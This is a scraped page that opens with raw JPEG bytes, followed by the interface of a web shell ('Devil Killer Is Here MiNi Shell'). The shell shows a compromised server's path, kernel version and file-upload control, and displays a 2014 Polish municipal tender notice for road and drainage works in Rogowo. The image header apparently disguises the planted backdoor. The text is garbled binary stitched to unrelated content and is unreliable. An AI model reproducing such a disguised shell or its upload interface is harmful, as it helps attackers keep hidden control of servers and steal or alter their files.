JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140702/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140702/142231-N-2014.html

<p class="kh_header"><b>Rogowo: Przebudowa dróg gminnych wraz z wykonaniem odwodnienia w m. Rogowo w ciągu ulic: Akacjowa, Brzozowa, Grzybowa, Łąkowa, Słoneczna i Topolowa ETAP II - Przebudowa dróg gminnych wraz z wykonaniem odwodnienia w ciągu ulic: Akacjowa, Słoneczna, Grzybowa i Topolowa w m. Rogowo</b><br>
<b>Numer ogłoszenia: 142231 - 2014; data zamieszczenia: 02.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogowo , ul. Kościelna 8, 88-420 Rogowo, woj. kujawsko-pomorskie, tel. 52 3024053, faks 52 3024275.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://rogowo.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych wraz z wykonaniem odwodnienia w m. Rogowo w ciągu ulic: Akacjowa, Brzozowa, Grzybowa, Łąkowa, Słoneczna i Topolowa ETAP II - Przebudowa dróg gminnych wraz z wykonaniem odwodnienia w ciągu ulic: Akacjowa, Słoneczna, Grzybowa i Topolowa w m. Rogowo.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Na przedmiot zamówienia składa się wykonanie odwodnienia ulic Akacjowej, część ulicy Słonecznej (od ul. Akacjowej do Łąkowej) Grzybowej i Topolowej w Rogowie wraz z wykonaniem nawierzchni ulic oraz jednostronnego ciągu chodnikowego z kostki betonowej.
Szczegółowe wymagania związane z realizacją przedmiotu zamówienia. 
1)Roboty budowlane obejmują wykonanie  kolektora kanalizacji deszczowej z rur PCV łączonych na wcisk O 250 mm, O 300 mm, oraz 400 mm typu SN-8, kl. S 
o ściankach litych ułożony ze spadkiem: 
a)ulica Akacjowa i  część ulicy Słonecznej (do ulicy Łąkowej) o łącznej długości 238,5m w tym ul. Akacjowa dł.163,5m i część ul. Słonecznej 75,0m: 
- wykonanie tras kanalizacyjnych wraz z inwentaryzacją geodezyjną - 0,24km,
-wykonanie wykopów ręcznie z załadunkiem ręcznym i transportem do 1 km  grunt kat. III - 10,00m3,
-wykonanie wykopów mechanicznie koparką podsiębierną 0,60 m3 w gruncie kat. III-IV o normalnej wilgotności, transport gruntu I-IV na odległość 3km - 452,79 m3,
- przemieszczenie mechaniczne na odkładzie na odległość do10m spycharkami gruntu odspojonego i wywiezienie kat. I-III - 452,79m3,
- umocnienie pełne wypraskami wraz z rozbiórką  ścian wykopu - 762,98m2,
- umocnienie ażurowe wypraskami wraz z rozbiórką ścian wykopu - 132,00m2,
- podłoże pod kanały i obiekty z piasku grubości 10 cm (wraz z kosztami zakupu
 i transportu piasku do miejsca wbudowania) - 16,56m3,
- ułożenie rurociągu O 250 - 80,00m,
- ułożenie rurociągu O 300 - 120,00m,
- wykonanie kaskad z rur i kształtek PCV o średnicy 250mm i wysokości 1,54m 
i 1,41m (trójnik, prostka, kolano) - 2 sztuki, 
-obetonowanie kaskad betonem kl. C16/20 wraz z wykonaniem i rozbiórką deskowań - 0,60m3,
- obsypka rurociągu piaskiem do wysokości 10cm ponad wierzch rur - 66,24m3,
- wymiana gruntu z wykopu na piasek łącznie z kosztami zakup i transportu do miejsca wbudowania) - 343,89m3,
- zasypanie wykopu z zagęszczeniem gruntu grub. 40cm do stopnia 0,98 - 343,89m3,
- montaż uzbrojenia sieci - studnia rewizyjna z kręgów betonowych O 1000 (SD26, SD25, SD24, SD23, SD22) - 5 szt.,
-montaż i demontaż konstrukcji rozpiętości 1,1 m podwieszeń kabli energetycznych, gazowych, telekomunikacyjnych typ lekki - 10,00kpl.,
-pompowanie wody z wykopów z wykonaniem niezbędnych studzienek drenażowych O 500mm w dnie wykopu - 100,00m-godz;
b)ulica Grzybowa;
- wykonanie tras kanalizacyjnych wraz z inwentaryzacją geodezyjną - 0,13km,
-wykonanie wykopów ręcznie z załadunkiem ręcznym i transportem do 1 km  grunt kat. III - 5,00m3,
-wykonanie wykopów mechanicznie koparką podsiębierną 0,60 m3 w gruncie kat. III-IV o normalnej wilgotności, przemieszczenie mechaniczne na odkładzie na odległość do 10m spycharkami gruntu odspojonego i wywiezionego oraz transport gruntu I-IV na odległość 3km - 186,66 m3,
- umocnienie ażurowe wypraskami wraz z rozbiórką ścian wykopu - 389,58m2,
- podłoże pod kanały i obiekty z piasku grubości 10 cm (wraz z kosztami zakupu 
i transportu piasku do miejsca wbudowania) - 10,08m3,
-ułożenie rurociągu O 300 - 129,00m,
- obsypka rurociągu piaskiem do wysokości 10cm ponad wierzch rur - 40,32m3,
-wymiana gruntu z wykopu na piasek łącznie z kosztami zakup i transportu do miejsca wbudowania) - 122,96m3,
- zasypanie wykopu z zagęszczeniem gruntu grub. 40cm do stopnia 0,98 - 122,96m3;
- montaż uzbrojenia sieci - studnia rewizyjna z kręgów betonowych O 1000 SD42,  SD40) - 2 sztuki,
-montaż i demontaż konstrukcji rozpiętości 1,1 m podwieszeń kabli energetycznych, gazowych, telekomunikacyjnych typ lekki - 2,00kpl.,  
-pompowanie wody z wykopów z wykonaniem niezbędnych studzienek drenażowych O 500mm w dnie wykopu - 50,00m-godz;
c)ulica Topolowa: 
- wykonanie tras kanalizacyjnych wraz z inwentaryzacją geodezyjną - 0,39km;
-wykonanie wykopów ręcznie z załadunkiem ręcznym i transportem do 1 km  grunt kat. III - 18,00m3,
-wykonanie wykopów mechanicznie koparką podsiębierną 0,60 m3 w gruncie kat. III-IV o normalnej wilgotności, przemieszczenie mechaniczne na odkładzie na odległość do 10m spycharkami gruntu odspojonego i wywiezionego oraz transport gruntu I-IV na odległość 3km - 1 241,01m3,
-umocnienie pełne wypraskami wraz z rozbiórką  ścian wykopu (gł. do 2,4m) 
- 1 808,60m2,
-umocnienie ażurowe wypraskami wraz z rozbiórką  ścian wykopu (gł. do 3,0m) 
- 183,00m2,
- podłoże pod kanały i obiekty z piasku grubości 10 cm (wraz z kosztami zakupu
 i transportu piasku do miejsca wbudowania) - 6,64m3,
- podłoże pod kanały i obiekty z piasku grubości 15 cm (wraz z kosztami zakupu 
i transportu piasku do miejsca wbudowania) - 46,20m3,
-ułożenie rurociągu O 300 - 85,00m,
- ułożenie rurociągu O 400 - 307,00m,
- obsypka rurociągu piaskiem do wysokości 10cm ponad wierzch rur - 184,06m3;
- wymiana gruntu z wykopu na piasek łącznie z kosztami zakup i transportu do miejsca wbudowania) - 911,80m3,
- zasypanie wykopu z zagęszczeniem gruntu grub. 40cm do stopnia 0,98 - 911,76m3;
- montaż uzbrojenia sieci - studnia rewizyjna z kręgów betonowych O 1000 (SD39 , SD38, SD37, SD36, SD35, SD34, SD33, SD32, SD31 włączenie w studnię SD6  w ulicy Łąkowej - 9 sztuk;
-montaż i demontaż konstrukcji rozpiętości 1,1 m podwieszeń kabli energetycznych, gazowych, telekomunikacyjnych typ lekki - 20,00kpl.,  
-pompowanie wody z wykopów z wykonaniem niezbędnych studzienek drenażowych O 500mm w dnie wykopu - 160,00m-godz;
2)Roboty drogowe obejmują wykonanie w ulicy Akacjowej o długości 163,5 m oraz część ulicy Słonecznej (od ul. Akacjowej do ul. Łąkowej) o długości 75,0 m łączna długość 238,5m:
a)robót przygotowawczych;
- roboty pomiarowe i inwentaryzacja powykonawcza (163,5+75,0m, szer. 5,50m) - 0,24km;
- roboty ziemne koparką przedsiębierną 0,60 m3 w gruncie kat. I-II z transportem na odległość 3km - 806,53 m3,
- roboty ziemne ręczne w gruncie kat. IV z transportem na odl. do 1 km (pod wpusty i przykanaliki) - 59,70m3,
- podgarnięcie lub rozplanowanie przywiezionej ziemi bez zagęszczania - 866,23m3,
-zasypanie przykanalika piaskiem dowiezionym wraz z zagęszczeniem piasku zagęszczarkami grunt sypki  kat.I-III, współ. R 0,955 - 56,30 m3;
b)krawężników i podbudowy;
- podbudowa betonowa Rm-2,5MPa z betoniarni grub. 15cm (pielęgnacja piaskiem 
i wodą - 1 311,75m2,
-warstwa podbudowy z tłucznia kamiennego łamanego twardego 0/63mm (np. melafir gabro, granit, z uwzględnieniem parametrów kruszywa WA24-2, mrozoodporność F 1, ścieralność LA<=20) grub. 20 cm - 1 311,75m2,
- wykonanie ławy pod krawężniki betonowa z oporem C12/15 - 33,76m3,
-lewostronny krawężnik betonowy wystający 15x30x100cm na podsypce cementowo - piaskowej - 184,00m,
-prawostronny krawężnik betonowy przejazdowy 15x22x100cm na podsypce cementowo - piaskowej  - 266,00m,
-lewostronny krawężnik betonowy 15x30x100cm ułożony na płask na podsypce cementowo - piaskowej (połączenie ulicy z ulicą Brzozową) - 7,00m;
c)robót w zakresie nawierzchni ulic;
-nawierzchnia jezdni z kostki betonowej szarej grubości 8cm na podsypce cementowo piaskowej h=3cm - 1 311,75m2,
d) robót w zakresie chodników i zjazdów na posesje:
- ława pod obrzeże betonowe z oporem C12/15 - 14,50m3,
-ustawienie obrzeży betonowych o wymiarach 8x25x100 cm na ławie betonowej C12/15 - 270,0m,
-wykonanie warstwy odsączającej w korycie, zagęszczenie mechaniczne grub. 10 cm - 419,50m2,
- wykonanie podbudowy z kruszywa twardego 0-31,5mm (np. melafir gabro, granit, z uwzględnieniem parametrów kruszywa WA24-2, mrozoodporność F 1, ścieralność LA<=20) grub. 15 cm - 140,50m2,
-wykonanie zjazdów na posesje z kostki betonowej (kolor czerwony) grub. 8 cm na  podsypce cementowo - piaskowej h=3cm - 140,50m2,
- wykonanie chodnika  z kostki betonowej (kolor szary) grubości 6 cm na podsypce cementowo - piaskowej h=5 cm - 279,00m2; 
e) robót wykończeniowych:
- regulacja pionowa włazów kanałowych - 6 szt.,
- regulacja pionowa zaworu wodociągowego - 6 szt.,
- obłożenie zaworów włazów kostka betonową szarą z docięciem trapezowym kostki do promienia włazu i zaworu grubości 8cm na podsypce cementowo - piaskowej h=3cm - 5,00m2,
- montaż wpustów ulicznych (O 500 z osadnikiem bez syfonu)  - 9 szt.,
- przykanalik kanalizacyjny PCV O 160 dł. do 15 m w wykopie umocnionym suchym - 75,00m,
- słupek do znaku drogowego z rur stalowych O 50 3 szt. z odzysku i 7 szt. nowych - 2 szt. wraz z montażem znaku drogowego o pow. 0,3 m2 sztuk 4 A-7 2 znaki odblaskowe typu M - małe z folią odblaskową typu 2 -  2 szt.,
- demontaż hydrantu nadziemnego O80 w wykopie pionowym - 2 szt.,
- montaż hydrantu pożarowego podziemnego O80 - 2 szt.,
- demontaż słupa zasilająco - oświetleniowego A-owego w chodniku i montaż nowego słupa wirowanego za pas przy chodniku z podłączeniami energetycznymi pod nadzorem Rejonu Dystrybucji w Mogilnie (pismo z ENEA z dnia 19.08.2010r.) - 1kpl.,
- ręczne planowanie pobocza i humusowanie poboczy z obsianiem gr. humusu 5 cm - 476,00m2;
3) Roboty drogowe obejmują wykonanie w ulicy Grzybowej:
a) robót przygotowawczych:
- roboty pomiarowe - trasa dróg i inwentaryzacja geodezyjna powykonawcza (172,0, szer. 5,50m) - 0,17km,
- roboty ziemne koparka podsiębierną 0,60 m3 w gr. kat. I-II z transportem wywrotkami na odległość 3km - 596,43m3,
- roboty ziemne ręczne w gruncie kat. IV z transportem na odl. do 1 km (pod wpusty i przykanaliki) - 28,60m3, 
- podgarnięcie lub rozplanowanie przywiezionej ziemi bez zagęszczania - 625,03m3,
-zasypanie przykanalika piaskiem dowiezionym wraz z zagęszczeniem piasku zagęszczarkami grunt sypki kat. I-III, współ. R 0,955 - 26,00m3,
- lewostronny krawężnik betonowy 15x30x100cm ułożony na płask na podsypce cementowo - piaskowej (połączenie ulicy z ulicą Brzozową) - 7,00m;
b)krawężników i podbudowy;
- podbudowa betonowa Rm-2,5MPa z betoniarni grub. 15cm (pielęgnacja piaskiem 
i wodą - 946,00m2,
-warstwa podbudowy z tłucznia kamiennego łamanego twardego 0/63mm (np. melafir gabro, granit, z uwzględnieniem parametrów kruszywa WA24-2, mrozoodporność F 1, ścieralność LA<=20) grub. 20 cm - 946,00m2,
- wykonanie ławy pod krawężniki betonowa z oporem C12/15 - 26,15m3,
-lewostronny krawężnik betonowy wystający 15x30x100cm na podsypce cementowo - piaskowej - 97,00m,
-lewostronny krawężnik betonowy przejazdowy 15x22x100cm i prawostronny krawężnik betonowy przejazdowy na podsypce cementowo - piaskowej  - 242,00m;
c) robót w zakresie nawierzchni ulic;
-nawierzchnia jezdni z kostki betonowej szarej grubości 8cm na podsypce cementowo piaskowej h=3cm - 946,00m2,
d) robót w zakresie chodników i zjazdów na posesje:
- ława pod obrzeże betonowe z oporem C12/15 - 14,50m3,
-ustawienie obrzeży betonowych o wymiarach 8x25x100 cm na ławie betonowej C12/15 - 278,50m,
-wykonanie warstwy odsączającej w korycie, zagęszczenie mechaniczne grub. 10cm - 339,50m2,
- wykonanie podbudowy z kruszywa twardego 0-31,5mm (np. melafir gabro, granit, z uwzględnieniem parametrów kruszywa WA24-2, mrozoodporność F 1, ścieralność LA<=20) grub. 15 cm - 147,50m2,
-wykonanie zjazdów na posesje z kostki betonowej (kolor czerwony) grub. 8 cm na  podsypce cementowo - piaskowej h=3cm - 147,50m2,
- wykonanie chodnika  z kostki betonowej (kolor szary) grubości 6 cm na podsypce cementowo - piaskowej h=5 cm - 192,00 m2; 
- ułożenie rur osłonowych dwudzielnych AROT RHDPE O 110/5,0 typ A 110 PS pod zjazdami i w jezdni (warunki TP SA) - 46,00m;
e) robót wykończeniowych:
- regulacja pionowa włazów kanałowych - 9 szt.,
- regulacja pionowa zaworu wodociągowego - 8 szt.,
- obłożenie zaworów włazów kostka betonową szarą z docięciem trapezowym kostki do promienia włazu i zaworu grubości 8cm na podsypce cementowo - piaskowej h=3 cm - 3,00 m2,
- montaż wpustów ulicznych (O 500 z osadnikiem bez syfonu)  - 6 szt.,
- przykanalik kanalizacyjny PCV O 160 dł. do 15 m w wykopie umocnionym suchym - 35,00m,
- słupek do znaku drogowego z rur stalowych O 50 3 szt. z odzysku i 7 szt. nowych - 4 szt. wraz z montażem znaku drogowego o pow. 0,3 m2 sztuk 4 A-7 1 szt. D-2 1 szt. D-1 2 szt znaki odblaskowe typu M - małe z folią odblaskową typu 2 -  4 szt.,
- ręczne planowanie pobocza i humusowanie poboczy z obsianiem gr. humusu 5 cm - 344,00m2;
4) Roboty drogowe obejmują wykonanie w ulicy Topolowej:
a)  robót przygotowawczych:
- roboty pomiarowe - trasa dróg i inwentaryzacja geodezyjna powykonawcza (295,00m, szer. 5,00m) - 0,30km,
- roboty ziemne koparka podsiębierną 0,60 m3 w gr. kat. I-II z transportem wywrotkami na odległość 3km - 1 703,52m3,
- roboty ziemne ręczne w gruncie kat. IV z transportem na odl. do 1 km (pod wpusty i przykanaliki) - 20,70m3, 
-podgarnięcie lub rozplanowanie przywiezionej ziemi bez zagęszczania - 
1 724,22m3;
-zasypanie przykanalika piaskiem dowiezionym wraz z zagęszczeniem piasku zagęszczarkami grunt sypki kat. I-III, współ. R 0,955 - 19,00m3;
b)krawężników i podbudowy;
- podbudowa betonowa Rm-2,5MPa z betoniarni grub. 15cm (pielęgnacja piaskiem i wodą - 1 475,00m2,
-warstwa podbudowy z tłucznia kamiennego łamanego twardego 0/63mm (np. melafir gabro, granit, z uwzględnieniem parametrów kruszywa WA24-2, mrozoodporność F 1, ścieralność LA<=20) grub. 20 cm - 1 475,00m2,
- wykonanie ławy pod krawężniki betonowa z oporem C12/15 - 35,40m3,
-obustronny krawężnik betonowy przejazdowy 15x22x100cm i prawostronny krawężnik betonowy przejazdowy na podsypce cementowo - piaskowej  - 590,00m;
c) robót w zakresie nawierzchni ulic;
-nawierzchnia jezdni z kostki betonowej szarej grubości 8cm na podsypce cementowo piaskowej h=3cm - 1 386,50m2,
- wykonanie ławy pod ściek jednostronny z kostki betonowej cegiełka 8x10x20cm (dwie kostki na płask jedna kostka na sztorc) na podsypce cementowo - piaskowej - 295,00m, 
d) robót w zakresie chodników i zjazdów na posesje:
- ława pod obrzeże betonowe z oporem C12/15 - 14,75m3,
-ustawienie obrzeży betonowych o wymiarach 8x25x100 cm na ławie betonowej C12/15 - 295,00m,
-wykonanie warstwy odsączającej w korycie, zagęszczenie mechaniczne grub. 10 cm (wjazdy wzmocniony chodnik) - 400,75m2,
- wykonanie podbudowy z kruszywa twardego 0-31,5mm (np. melafir gabro, granit, z uwzględnieniem parametrów kruszywa WA24-2, mrozoodporność F 1, ścieralność LA<=20) grub. 15 cm - 104,50m2,
-wykonanie zjazdów na posesje z kostki betonowej (kolor czerwony) grub. 8 cm na  podsypce cementowo - piaskowej h=3cm - 104,50m2,
-wykonanie nawierzchni wzmocnionego chodnika z kostki betonowej szarej grubości 8cm na podsypce cementowo - piaskowej h=3cm - 296,25m2,
- ułożenie rur osłonowych dwudzielnych AROT RHDPE O 110/5,0 typ A 110 PS pod zjazdami i w jezdni (warunki TP SA) - 94,00m;
e) robót wykończeniowych:
- regulacja pionowa włazów kanałowych - 15 szt.,
- regulacja pionowa zaworu wodociągowego - 8 szt.,
- obłożenie zaworów włazów kostka betonową szarą z docięciem trapezowym kostki do promienia włazu i zaworu grubości 8cm na podsypce cementowo - piaskowej - 6,00 m2,
- montaż wpustów ulicznych (O 500 z osadnikiem bez syfonu)  - 4 szt.,
- przykanalik kanalizacyjny PCV O 160 dł. do 15 m w wykopie umocnionym suchym - 25,00m,
- demontaż hydrantu nadziemnego O80 w wykopie pionowym - 1 szt.,
- montaż hydrantu pożarowego podziemnego O80 - 1 szt.,
- demontaż słupa zasilająco - oświetleniowego w jezdni i montaż nowego słupa wirowanego za pas przy chodniku z podłączeniami energetycznymi pod nadzorem Rejonu Dystrybucji w Mogilnie (pismo z ENEA z dnia 19.08.2010r.) - 1kpl.,
- ręczne planowanie pobocza i humusowanie poboczy z obsianiem gr. humusu 5 cm - 470,00m2,
- odmładzanie starszych drzew o średnicy pni 21-30cm - cięcie pielęgnacyjne gałęzi będących w skrajni drogowej - 15 szt..
5) Zamawiający zaleca dokonanie wizji w terenie przed przystąpieniem do    przygotowania oferty; 
6)Wymagania dotyczące robót:
a)wszystkie prace winny być zrealizowane zgodnie z przepisami, obowiązującymi normami, warunkami technicznymi i sztuką budowlaną, przepisami bhp, p.poż., ochrony zdrowia i środowiska oraz zgodnie z poleceniami inspektora nadzoru;
b)roboty należy prowadzić zgodnie z wymaganiami dokumentacji określającej przedmiot zamówienia, specyfikacją techniczną wykonania i odbioru robót budowlanych oraz wymogami niniejszej SIWZ;
c)wszystkie materiały użyte do wykonania zamówienia winny spełniać wymogi art. 10 ustawy Prawo budowlane oraz wymogi ustawy z dnia 16 kwietnia 2004r. o wyrobach budowlanych (Dz. U. Nr 92, poz. 881 z późn. zm.) oraz odpowiadać warunkom opisanym w przedmiarach robót.
d)Wykonawca realizuje zadanie zgodnie z przedmiarem robot, obowiązującymi warunkami technicznymi, normami państwowymi i branżowymi, przepisami prawa budowlanego oraz zaleceniami inspektora nadzoru lub Zamawiającego w porozumieniu z inspektorem nadzoru.
7)Do obowiązków Wykonawcy należeć będzie również:
a)do formularza ofertowego załączyć kosztorys ofertowy sporządzony metodą szczegółową;
b)wykonanie prac towarzyszących (geodezyjne wytyczenie i inwentaryzację powykonawczą w 3 egz.);
c)organizacja dojść i dojazdów do posesji w trakcie prowadzenia robót;
d)oznakowanie miejsca wykonywania robót zgodnie z obowiązującymi przepisami;
e)odpowiedzialność za całokształt, w tym za przebieg oraz terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi jakościowymi określonymi dla przedmiotu zamówienia;
f)sporządzenie planu bezpieczeństwa pracy i ochrony zdrowia (BIOZ) przez kierownika budowy (robót); 
g)wykonanie projektu organizacji ruchu na czas budowy;
h)Wykonawca na czas budowy winien wykonać odwodnienie wykopów zgodnie 
z opracowaną dokumentacją geotechniczną dla określenia warunków gruntowo - wodnych w związku z budową kanalizacji deszczowej w Rogowie Osiedle Wiktorowo;
i)wymagana jest należyta staranność przy realizacji zamówienia, rozumiana jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia;
j)organizacja placu budowy oraz jego zabezpieczenie przed dostępem osób trzecich;
k) w przypadku uszkodzenia jakiejkolwiek infrastruktury technicznej podziemnej          (kabli telekomunikacyjnych, kabli energetycznych, sieci wodociągowej wraz z przyłączami, sieci kanalizacyjnej wraz z przyłączami) Wykonawca będzie zobowiązany we własnym zakresie i na własny koszt niezwłocznie je usunąć po uprzednim zawiadomieniu inwestora, gestora urządzeń;
l)pokrycie kosztów zużycia energii elektrycznej i wody;
m)wykonanie niezbędnych sprawdzeń, badań i pomiarów; 
n)po zakończeniu robót, ale przed ostatecznym odbiorem przez Zamawiającego Wykonawca zobowiązany jest do uporządkowania terenu budowy wraz z terenem przyległym;
o)po wykonaniu przez Wykonawcę robót przewidzianych niniejszą SIWZ Zamawiający dokona ich odbioru. Celem odbioru jest sprawdzenie należytego wykonania tych robót tzn. zgodnie z dokumentacją techniczną, Specyfikacją techniczną wykonania i odbioru robót budowlanych, przy uwzględnieniu wszystkich pozycji wynikających z przedmiaru robót;
p)przed przystąpieniem do końcowego odbioru robót Wykonawca przedstawia Zamawiającemu certyfikaty lub atesty na zastosowany materiał, protokóły zagęszczania gruntu po trasach wybudowania kanalizacji deszczowej, kosztorysy szczegółowe powykonawcze - zgodnie z załączonymi przedmiarami robót, książkę obmiaru robót oraz dziennik budowy;
q)spełnienie innych wymagań określonych we wzorze umowy oraz wynikających         z obowiązujących przepisów prawa.
8)Możliwość zatrudnienia podwykonawców:
a)Zamawiający dopuszcza możliwość powierzenia przez Wykonawcę wykonanie  części zamówienia podwykonawcom; w takim przypadku Wykonawca jest zobowiązany do wskazania w swojej ofercie części zamówienia (zakresu), której wykonanie zamierza powierzyć podwykonawcom;
b)Zamawiający może zgodnie z art. 6471 k.c. wnieść sprzeciw lub zastrzeżenia         do umowy zawartej pomiędzy Wykonawcą a podwykonawcą.
9)Zamawiający wymaga, że:
a)Wykonawca udzieli min. 36 miesięcznej gwarancji liczonej od dnia odebrania przez Zamawiającego robót budowlano - montażowych i podpisania (bez uwag) protokółu końcowego;
b)na odbiór końcowy  przedmiotu zamówienia Wykonawca przedłoży:
- protokóły odbiorów technicznych,
- protokoły z wymaganych; badań, prób,
-atesty, certyfikaty, deklaracje zgodności i aprobaty techniczne na wbudowane materiały  
- kosztorys powykonawczy sporządzony metodą szczegółową. 
10)Zamawiający nie zapewnia zaplecza socjalno - technicznego oraz innych mediów potrzebnych do realizacji zamówienia i nie ponosi odpowiedzialności za mienie zgromadzone na placu budowy.  
11)Zamawiający posiada:
a) pozwolenie na budowę Nr 86 znak UA. 6740.84.2011 dla przedsięwzięcia pn. Przebudowa dróg gminnych wraz z wykonaniem odwodnienia w m. Rogowo w ciągu ulic: Akacjowa, Brzozowa, Grzybowa, Łąkowa, Słoneczna i Topolowa z dnia 28 marca 2011r.;
b)pozwolenie wodno - prawne znak OŚ. 6223-32/10 z dnia 8 listopada 2010r.;
c)dokumentację geotechniczną dla określenia warunków gruntowo - wodnych           w związku z budową kanalizacji deszczowej  w Rogowie Osiedle Wiktorowo - opracowanie z września 2010r. 

